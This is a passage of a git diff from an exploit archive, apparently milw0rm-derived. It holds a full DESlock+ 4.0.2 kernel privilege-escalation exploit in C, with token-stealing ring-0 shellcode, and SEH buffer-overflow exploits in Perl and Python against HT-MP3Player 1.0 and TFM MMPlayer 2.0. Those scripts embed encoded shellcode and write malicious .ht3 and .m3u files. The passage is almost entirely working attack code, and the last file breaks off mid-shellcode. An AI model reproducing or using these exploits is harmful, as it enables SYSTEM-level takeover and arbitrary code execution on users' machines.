&winxp_ring0_shell[55] = ppid; - return (winxp_ring0_shell); - - case 2: - *zlen = sizeof win2k3_ring0_shell - 1; - *(PDWORD) &win2k3_ring0_shell[58] = 
ppid; - return (win2k3_ring0_shell); - - default: - fprintf (stderr, "* GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - return (NULL); -} - -int -main (int argc, char **argv) -{ - struct ioctl_req_enable req_enable; - struct ioctl_req req; - struct ioctl_ptr ptr; - struct ioctl_pid pid; - struct ioctl_func func; - LPVOID c_addr, zpage, zbuf; - DWORD rlen, zlen, ppid; - HANDLE hFile; - BOOL bResult; - - printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - ppid = atoi (argv[1]); - - hFile = CreateFileA ("\\\\.\\DLPCryptCore", FILE_EXECUTE, - FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, - OPEN_EXISTING, 0, NULL); - if (hFile == INVALID_HANDLE_VALUE) - { - fprintf (stderr, "* CreateFileA failed, %d\n", hFile); - exit (EXIT_FAILURE); - } - - zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); - if (zpage == NULL) - { - fprintf (stderr, "* VirtualAlloc failed\n"); - exit (EXIT_FAILURE); - } - printf ("* allocated page: 0x%08X [%d-bytes]\n", - zpage, 0x10000); - - memset (zpage, 0xCC, 0x10000); - zbuf = fixup_ring0_shell (ppid, &zlen); - memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1); - memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen); - memcpy (zpage + sizeof (win32_fixup) + zlen - 1, - win32_ret, sizeof (win32_ret) - 1); - - memset (&req_enable, 0, sizeof req_enable); - req_enable.flag[0] = DLPCRYPT_FLAG1; - req_enable.flag[1] = DLPCRYPT_FLAG2; - req_enable.len = sizeof req_enable; - - printf ("* verifying context... 
"); - bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED, - &req_enable, sizeof req_enable, - &req_enable, sizeof req_enable, &rlen, 0); - if (!bResult) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled); - - printf ("* adding pid [%d]... ", GetCurrentProcessId ()); - bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD, - &req_enable, sizeof req_enable, - &req_enable, sizeof req_enable, &rlen, 0); - if (!bResult) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("done\n"); - - memset (&req, 0, sizeof req); - req.flag[0] = DLPCRYPT_FLAG1; - req.flag[1] = DLPCRYPT_FLAG2; - req.len = sizeof req; - req.action = 2; - req.ptr = &ptr; - - memset (&ptr, 0, sizeof ptr); - ptr.ppid = &pid; - ptr.action = 2; - ptr.func = &func; - - memset (&pid, 0, sizeof pid); - pid.pid = GetCurrentProcessId (); - - memset (&func, 0, sizeof func); - func.func_ptr = &c_addr; - - c_addr = (LPVOID) zpage; - - printf ("* req.ptr: 0x%08X\n", &ptr); - printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr: 0x%08X\n", - &ptr, ptr.ppid, ptr.func); - printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr); - printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr); - - /* jump to our address :) */ - printf ("* jumping.. "); - bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS, - &req, sizeof req, &req, sizeof req, &rlen, 0); - if (!bResult) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("done\n\n" - "* hmmm, you didn't STOP the box?!?!\n"); - - CloseHandle (hFile); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2009-06-18] +/* deslock-dlpcrypt.c + * + * Copyright (c) 2009 by + * + * DESlock+ 4.0.2 local kernel SYSTEM exploit + * by mu-b - Thu 18 Jun 2009 + * + * - Tested on: dlpcrypt.sys 0.1.1.27 + * + * .text:0001BB2E: 'what do ya want for nothing?' 
+ * - hmmm, something that doesn't pass kernel mode pointers + * between kernel and userland? + * + * Compile: MinGW + -lntdll + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2009!@$! + */ + +#include +#include + +#include + +#define DLPCRYPT_IOCTL_ENABLED 0x8001200C +#define DLPCRYPT_IOCTL_ADD 0x80012004 +#define DLPCRYPT_IOCTL_PROCESS 0x80012010 + +#define DLPCRYPT_FLAG1 0x13B45FA8 +#define DLPCRYPT_FLAG2 0xBFD294C9 + +static unsigned char win32_fixup[] = + "\x56"; + +/* Win2k3 SP1/2 - kernel EPROCESS token switcher + * by mu-b + */ +static unsigned char win2k3_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\xb0\x18\x02\x00\x00" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! */ + "\x8b\x89\xd8\x00\x00\x00" + "\x89\x88\xd8\x00\x00\x00" + "\x90"; + +static unsigned char winxp_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\x70\x44" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! 
*/ + "\x8b\x89\xc8\x00\x00\x00" + "\x89\x88\xc8\x00\x00\x00" + "\x90"; + +static unsigned char win32_ret[] = + "\x5e" + "\x58" + "\x58" + "\x33\xc0" + "\x5e" + "\x5d" + "\xc2\x0c\x00"; + +struct ioctl_req_enable { + int flag[2]; + int len; + int result; + int enabled; + char pad[0x38 - 0x14]; +}; + +struct ioctl_req { + int flag[2]; + int len; + int result; + int action; + struct ioctl_ptr *ptr; + char pad[0x38 - 0x18]; +}; + +struct ioctl_ptr { + char pad[0x8]; + struct ioctl_pid *ppid; + int action; + char _pad[0x4]; + struct ioctl_func *func; +}; + +struct ioctl_pid { + char pad[0x14]; + DWORD pid; +}; + +struct ioctl_func { + void *func_ptr; +}; + +static PCHAR +fixup_ring0_shell (DWORD ppid, DWORD *zlen) +{ + DWORD dwVersion, dwMajorVersion, dwMinorVersion; + + dwVersion = GetVersion (); + dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); + dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); + + if (dwMajorVersion != 5) + { + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + switch (dwMinorVersion) + { + case 1: + *zlen = sizeof winxp_ring0_shell - 1; + *(PDWORD) &winxp_ring0_shell[55] = ppid; + return (winxp_ring0_shell); + + case 2: + *zlen = sizeof win2k3_ring0_shell - 1; + *(PDWORD) &win2k3_ring0_shell[58] = ppid; + return (win2k3_ring0_shell); + + default: + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + return (NULL); +} + +int +main (int argc, char **argv) +{ + struct ioctl_req_enable req_enable; + struct ioctl_req req; + struct ioctl_ptr ptr; + struct ioctl_pid pid; + struct ioctl_func func; + LPVOID c_addr, zpage, zbuf; + DWORD rlen, zlen, ppid; + HANDLE hFile; + BOOL bResult; + + printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + ppid = atoi (argv[1]); + + hFile = CreateFileA 
("\\\\.\\DLPCryptCore", FILE_EXECUTE, + FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, + OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + fprintf (stderr, "* CreateFileA failed, %d\n", hFile); + exit (EXIT_FAILURE); + } + + zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (zpage == NULL) + { + fprintf (stderr, "* VirtualAlloc failed\n"); + exit (EXIT_FAILURE); + } + printf ("* allocated page: 0x%08X [%d-bytes]\n", + zpage, 0x10000); + + memset (zpage, 0xCC, 0x10000); + zbuf = fixup_ring0_shell (ppid, &zlen); + memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1); + memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen); + memcpy (zpage + sizeof (win32_fixup) + zlen - 1, + win32_ret, sizeof (win32_ret) - 1); + + memset (&req_enable, 0, sizeof req_enable); + req_enable.flag[0] = DLPCRYPT_FLAG1; + req_enable.flag[1] = DLPCRYPT_FLAG2; + req_enable.len = sizeof req_enable; + + printf ("* verifying context... "); + bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED, + &req_enable, sizeof req_enable, + &req_enable, sizeof req_enable, &rlen, 0); + if (!bResult) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled); + + printf ("* adding pid [%d]... 
", GetCurrentProcessId ()); + bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD, + &req_enable, sizeof req_enable, + &req_enable, sizeof req_enable, &rlen, 0); + if (!bResult) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + memset (&req, 0, sizeof req); + req.flag[0] = DLPCRYPT_FLAG1; + req.flag[1] = DLPCRYPT_FLAG2; + req.len = sizeof req; + req.action = 2; + req.ptr = &ptr; + + memset (&ptr, 0, sizeof ptr); + ptr.ppid = &pid; + ptr.action = 2; + ptr.func = &func; + + memset (&pid, 0, sizeof pid); + pid.pid = GetCurrentProcessId (); + + memset (&func, 0, sizeof func); + func.func_ptr = &c_addr; + + c_addr = (LPVOID) zpage; + + printf ("* req.ptr: 0x%08X\n", &ptr); + printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr: 0x%08X\n", + &ptr, ptr.ppid, ptr.func); + printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr); + printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr); + + /* jump to our address :) */ + printf ("* jumping.. "); + bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS, + &req, sizeof req, &req, sizeof req, &rlen, 0); + if (!bResult) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("done\n\n" + "* hmmm, you didn't STOP the box?!?!\n"); + + CloseHandle (hFile); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2009-06-18] diff --git a/platforms/windows/local/9034.pl b/platforms/windows/local/9034.pl index 4abb9ea21..b44e647b7 100755 --- a/platforms/windows/local/9034.pl +++ b/platforms/windows/local/9034.pl 
@@ -1,42 +1,42 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh) -# # Greetz to all my friends -# form egypt -## easy :d -## Tested on: Windows XP Pro SP2 (EN) -########################################################## -my $bof="\x41" x 4108; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xbe\x2e\xd1\x72"; -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -############################################################ -open(myfile,'>>hack4love.ht3'); -print myfile $bof.$nsh.$seh.$nop.$sec; -############################################################ - -# milw0rm.com [2009-06-29] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh) +# # Greetz to all my friends +# form egypt +## easy :d +## Tested on: Windows XP Pro SP2 (EN) +########################################################## +my $bof="\x41" x 4108; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xbe\x2e\xd1\x72"; +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". 
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +############################################################ +open(myfile,'>>hack4love.ht3'); +print myfile $bof.$nsh.$seh.$nop.$sec; +############################################################ + +# milw0rm.com [2009-06-29] diff --git a/platforms/windows/local/9038.py b/platforms/windows/local/9038.py index 5056c534c..f4d0c15ac 100755 --- a/platforms/windows/local/9038.py +++ b/platforms/windows/local/9038.py 
@@ -1,50 +1,50 @@ -#usage: exploit.py -print "**************************************************************************" -print " HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)\n" -print " Original author: hack4love<=(my friend)\n" -print " Universal exploit : His0k4\n" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " greetz: All friends (DZ),sec-r1z.com\n" -print "**************************************************************************" - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47" -"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38" -"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48" -"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" -"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58" -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44" -"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" -"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53" -"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57" -"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43" -"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" -"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" -"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" 
-"\x4e\x56\x43\x46\x42\x50\x5a") - -payload = "D_Z" -payload += shellcode -payload += "\x41"*(4100-len(shellcode)) -payload += "\xE9\xF7\xEF\xFF\xFF" -payload += "\x74\xF9\x42\x42" -payload += "\x8C\x27\x40\x00" #p/p/r HTMP3Player.exe - -try: - out_file = open("exploit.ht3",'w') - out_file.write(payload) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-06-29] +#usage: exploit.py +print "**************************************************************************" +print " HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)\n" +print " Original author: hack4love<=(my friend)\n" +print " Universal exploit : His0k4\n" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " greetz: All friends (DZ),sec-r1z.com\n" +print "**************************************************************************" + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47" +"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38" +"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48" +"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" +"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58" +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44" +"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" +"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53" +"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57" 
+"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43" +"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" +"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" +"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" +"\x4e\x56\x43\x46\x42\x50\x5a") + +payload = "D_Z" +payload += shellcode +payload += "\x41"*(4100-len(shellcode)) +payload += "\xE9\xF7\xEF\xFF\xFF" +payload += "\x74\xF9\x42\x42" +payload += "\x8C\x27\x40\x00" #p/p/r HTMP3Player.exe + +try: + out_file = open("exploit.ht3",'w') + out_file.write(payload) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-06-29] diff --git a/platforms/windows/local/9047.pl b/platforms/windows/local/9047.pl index 70cba4df8..2fc0d2e36 100755 --- a/platforms/windows/local/9047.pl +++ b/platforms/windows/local/9047.pl 
@@ -1,43 +1,43 @@ -#!/usr/bin/perl -#[+] Bug : TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH) -#[+] Author : ThE g0bL!N -# # Greetz to all my friends -## Tested on: Windows XP Pro SP2 (Fr) -# Big Thnx :His0k4 -#Download:http://www.tfm.ro/mmplayer/download/mmplayer.zip -########################################################## -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". -"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". -"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". -"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". -"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". -"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". -"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". 
-"\x4e\x46\x43\x36\x42\x50\x5a"; -my $pad1="D_Z"; #trick track -my $junk="\x41" x (4088-length($shellcode)); -my $jmp="\xE9\x03\xF0\xFF\xFF"; -my $pad2="\x42"x 12; -my $next_seh="\xEB\xED\x41\x42"; -my $seh="\xB4\x28\x40\x00"; - -open(myfile,'>>exploit.m3u'); -print myfile $pad1.$shellcode.$junk.$jmp.$pad2.$next_seh.$seh; - -# milw0rm.com [2009-06-30] +#!/usr/bin/perl +#[+] Bug : TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH) +#[+] Author : ThE g0bL!N +# # Greetz to all my friends +## Tested on: Windows XP Pro SP2 (Fr) +# Big Thnx :His0k4 +#Download:http://www.tfm.ro/mmplayer/download/mmplayer.zip +########################################################## +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". +"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". +"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". 